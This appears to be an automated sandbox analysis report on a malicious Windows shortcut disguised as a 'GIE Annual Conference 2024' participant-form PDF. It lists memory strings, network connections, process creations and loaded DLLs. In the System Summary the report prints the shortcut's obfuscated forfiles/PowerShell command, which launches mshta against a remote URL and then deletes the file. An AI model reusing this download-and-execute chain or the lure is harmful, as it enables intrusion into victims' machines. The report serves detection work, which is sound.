Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1P
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/hoverIntent.min.js?ver=1.10.2
Source: mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.000001840776B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
Source: mshta.exe, 00000003.00000002.2954468582.0000018407B2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1934399175.0000018407B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1%
Source: mshta.exe, 00000003.00000002.2953230766.0000018407710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1-shop.css?ver=3.17.5
Source: mshta.exe, 00000003.00000002.2954352575.00000184079F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.12
Source: mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933398840.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953388040.00000184077C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1J5
Source: mshta.exe, 00000003.00000002.2955784251.000001840C804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1kC:
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/js/zxcvbn-async.min.js?ver=1.0
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-includes/wlwmanifest.xml
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-json/
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/xmlrpc.php
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/xmlrpc.php?rsd
Source: mshta.exe, 00000003.00000002.2953889531.0000018407925000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.uasearch_desc_varianttaxonomy_compatibilitysearch_by_full_wordview_text_lengthsku_
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000002.00000002.1731496106.00000226019EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1744803090.0000022610080000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1744803090.00000226101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000005.00000003.1899762996.000001FF74F42000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-PTB9RGG
Source: mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.morkva.co.ua?utm_source=client-site&utm_medium=client-footer-link
Source: mshta.exe, 00000003.00000003.1823467641.0000018407A7E000.00000004.00000020.00020000.00000000.sdmp, front[1].css0.3.drString found in binary or memory: https://www.svgrepo.com/vectors/search/4
Source: mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 61715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61718
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61717
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 61717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 61718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 185.68.16.189:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

barindex
Windows shortcut file (LNK) contains suspicious command line arguments
Source: T15hf0Y3mp.lnkLNK file: /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal76.winLNK@7/39@1/2
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4cjefny.qes.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\forfiles.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: T15hf0Y3mp.lnkReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRgJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Jump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
